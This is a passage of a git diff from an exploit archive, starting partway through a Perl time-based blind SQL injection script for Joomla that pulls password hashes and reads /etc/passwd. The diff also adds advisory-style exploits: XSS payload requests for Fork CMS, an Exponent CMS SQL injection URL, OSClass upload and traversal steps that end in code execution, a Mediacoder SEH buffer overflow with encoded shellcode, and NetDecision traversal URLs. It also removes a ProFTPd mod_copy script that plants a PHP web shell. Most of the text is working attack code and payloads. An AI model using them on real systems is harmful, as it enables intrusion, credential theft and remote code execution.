my $wtime = $ARGV[1];
|
||||
my $sql = $ARGV[2];
|
||||
|
||||
unless ($ARGV[2]) {
|
||||
print "$0 <url> <wait time> <sql>\n";
|
||||
print "\texamples:\n";
|
||||
print "\t get admin password:\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
|
||||
print "\t get file /etc/passwd\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
|
||||
exit 1;
|
||||
}
|
||||
|
||||
my ($len,$sqldata);
|
||||
|
||||
my $ua = LWP::UserAgent->new;
|
||||
$ua->timeout(60);
|
||||
$ua->env_proxy;
|
||||
|
||||
my $stime = time();
|
||||
my $res = $ua->get($url);
|
||||
my $etime = time();
|
||||
my $regrtt = $etime - $stime;
|
||||
print "rtt: $regrtt secs\n";
|
||||
print "vuln?: ";
|
||||
|
||||
my $sleep = $regrtt + $wtime;
|
||||
$stime = time();
|
||||
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
|
||||
|
||||
|
||||
my $lenoflen;
|
||||
sub len {
|
||||
# length of length
|
||||
for (1..5) {
|
||||
my $sql=$_[0];
|
||||
$stime = time();
|
||||
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) {
|
||||
$lenoflen = $_;
|
||||
last;
|
||||
}
|
||||
}
|
||||
for (1..$lenoflen) {
|
||||
my $ll;
|
||||
$ll=$_;
|
||||
for (0..9) {
|
||||
my $sql=$_[0];
|
||||
$stime = time();
|
||||
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) {
|
||||
$len .= $_;
|
||||
}
|
||||
}
|
||||
}
|
||||
return $len;
|
||||
|
||||
}
|
||||
|
||||
sub data {
|
||||
my $sql = $_[0];
|
||||
my $len = $_[1];
|
||||
my ($bit, $str, @byte);
|
||||
my $high = 128;
|
||||
|
||||
for (1..$len) {
|
||||
my $c=8;
|
||||
@byte="";
|
||||
my $a=$_;
|
||||
for ($bit=1;$bit<=$high;$bit*=2) {
|
||||
$stime = time();
|
||||
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
|
||||
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) {
|
||||
$byte[$c]="0";
|
||||
} else { $byte[$c]="1"; }
|
||||
$c--;
|
||||
}
|
||||
$str = join("",@byte);
|
||||
print pack("B*","$str");
|
||||
}
|
||||
}
|
||||
|
||||
$len = len($sql);
|
||||
print "$sql length: $len\n";
|
||||
print "$sql data:\n\n";
|
||||
data($sql,$len);
|
61
platforms/php/webapps/36914.txt
Executable file
61
platforms/php/webapps/36914.txt
Executable file
|
@ -0,0 +1,61 @@
|
|||
source: http://www.securityfocus.com/bid/52319/info
|
||||
|
||||
Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script>
|
||||
|
||||
http://www.example.com/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script>
|
||||
|
||||
http://www.example.com/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script>
|
||||
|
||||
http://www.example.com/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script>
|
||||
|
||||
http://www.example.com/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script>
|
||||
|
||||
http://www.example.com/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script>
|
||||
|
||||
Parameter: form_token
|
||||
Method: POST
|
||||
|
||||
- POST /private/en/authentication/?querystring=/private/en HTTP/1.1
|
||||
Content-Length: 134
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B
|
||||
Host: localhost:80
|
||||
Connection: Keep-alive
|
||||
Accept-Encoding: gzip,deflate
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
||||
|
||||
backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in
|
||||
|
||||
Parameters: position_1, position_2, position_3, position_4
|
||||
Method: POST
|
||||
|
||||
- POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1
|
||||
|
||||
form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D
|
||||
|
||||
Parameter: success_message
|
||||
Method: POST
|
||||
|
||||
- POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1
|
||||
|
||||
form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en
|
||||
|
||||
Parameter: smtp_password
|
||||
Method: POST
|
||||
|
||||
- POST http://localhost/private/en/settings/email HTTP/1.1
|
||||
|
||||
form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script>
|
||||
|
||||
Parameters: site_html_footer, site_html_header
|
||||
Method: POST
|
||||
|
||||
- POST http://localhost/private/en/settings/index HTTP/1.1
|
||||
|
||||
form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=
|
9
platforms/php/webapps/36916.txt
Executable file
9
platforms/php/webapps/36916.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/52328/info
|
||||
|
||||
Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20"
|
43
platforms/php/webapps/36917.txt
Executable file
43
platforms/php/webapps/36917.txt
Executable file
|
@ -0,0 +1,43 @@
|
|||
source: http://www.securityfocus.com/bid/52336/info
|
||||
|
||||
OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
|
||||
|
||||
An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process.
|
||||
|
||||
OSClass 2.3.5 is vulnerable; prior versions may also be affected.
|
||||
|
||||
Arbitrary File Upload Vulnerability:
|
||||
|
||||
1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)
|
||||
|
||||
2. Upload that file as picture for a new item and get its name (is 5_small.jpg)
|
||||
|
||||
3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)
|
||||
|
||||
4. Use combine.php to move itself to oc-content/uploads
|
||||
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
|
||||
now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded)
|
||||
|
||||
5. Use uploads/combine.php to move 5_original.php to /remote.php
|
||||
http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php
|
||||
|
||||
|
||||
6. Run the uploaded php file
|
||||
http://www.example.com/osclass/remote.php
|
||||
|
||||
|
||||
|
||||
|
||||
Directory Traversal Vulnerability:
|
||||
|
||||
It is possible to download and arbitrary file (ie config.php) under the www root.
|
||||
|
||||
1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)
|
||||
|
||||
2. Move combine.php into web root
|
||||
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php
|
||||
|
||||
3. Run combine to download config.php
|
||||
http://www.example.com/osclass/combine.php?files=config.php
|
||||
|
||||
|
50
platforms/windows/local/36920.py
Executable file
50
platforms/windows/local/36920.py
Executable file
|
@ -0,0 +1,50 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
|
||||
# Date: 05/May/2015
|
||||
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
|
||||
# email: kwiha2003 [at ]yahoo [dot] com=20
|
||||
# Version: 0.8.34.5716
|
||||
# Tested on: Win XP3
|
||||
# Vendor: http://www.mediacoderhq.com/
|
||||
# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
|
||||
info&file=3DMediaCoder-0.8.34.5716.exe
|
||||
|
||||
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
|
||||
# Notes: Due to insifficient space after taking control of the EIP, you hav=
|
||||
e to jump backwards and also=20
|
||||
# avoid a few bad bytes after the "A"s.
|
||||
|
||||
#!/usr/bin/python
|
||||
buffersize =3D 853
|
||||
buffer =3D ("http://" + "\x41" * 256)
|
||||
#Space for shellcode to decode
|
||||
buffer +=3D "\x90" * 24
|
||||
# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c=
|
||||
-e x86/shikata_ga_nai
|
||||
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
|
||||
#unsigned char buf[] =3D=20
|
||||
buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
|
||||
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
|
||||
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
|
||||
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
|
||||
"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
|
||||
"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
|
||||
"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
|
||||
"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
|
||||
"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
|
||||
"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
|
||||
"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
|
||||
"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
|
||||
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
|
||||
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
|
||||
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
|
||||
buffer +=3D "\x42" * 350
|
||||
nseh =3D "\xEB\x06\x90\x90"
|
||||
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
|
||||
seh=3D"\xee\x04\x01\x66"
|
||||
#Jump back 603 bytes due to insufficient space for shellcode
|
||||
jmpbck =3D "\xe9\xA5\xfd\xff\xff"
|
||||
junk =3D ("D" * 55)=20
|
||||
f=3D open("exploit.m3u",'w')
|
||||
f.write(buffer + nseh + seh + jmpbck + junk)
|
||||
f.close()
|
|
@ -1,47 +0,0 @@
|
|||
# Title: ProFTPd 1.3.5 Remote Command Execution
|
||||
# Date : 20/04/2015
|
||||
# Author: R-73eN
|
||||
# Software: ProFTPd 1.3.5 with mod_copy
|
||||
# Tested : Kali Linux 1.06
|
||||
# CVE : 2015-3306
|
||||
# Greetz to Vadim Melihow for all the hard work .
|
||||
import socket
|
||||
import sys
|
||||
import requests
|
||||
#Banner
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
if(len(sys.argv) < 4):
|
||||
print '\n Usage : exploit.py server directory cmd'
|
||||
else:
|
||||
server = sys.argv[1] #Vulnerable Server
|
||||
directory = sys.argv[2] # Path accessible from web .....
|
||||
cmd = sys.argv[3] #PHP payload to be executed
|
||||
evil = '<?php system("' + cmd + '") ?>'
|
||||
s.connect((server, 21))
|
||||
s.recv(1024)
|
||||
print '[ + ] Connected to server [ + ] \n'
|
||||
s.send('site cpfr /etc/passwd')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + evil)
|
||||
s.recv(1024)
|
||||
s.send('site cpfr /proc/self/fd/3')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + directory + 'infogen.php')
|
||||
s.recv(1024)
|
||||
s.close()
|
||||
print '[ + ] Payload sended [ + ]\n'
|
||||
print '[ + ] Executing Payload [ + ]\n'
|
||||
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
|
||||
if (r.status_code == 200):
|
||||
print '[ * ] Payload Executed Succesfully [ * ]'
|
||||
else:
|
||||
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
|
||||
|
||||
print '\n http://infogen.al/'
|
10
platforms/windows/remote/36915.txt
Executable file
10
platforms/windows/remote/36915.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/52327/info
|
||||
|
||||
NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||
|
||||
NetDecision 4.6.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
|
||||
http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini
|
Loading…
Add table
Reference in a new issue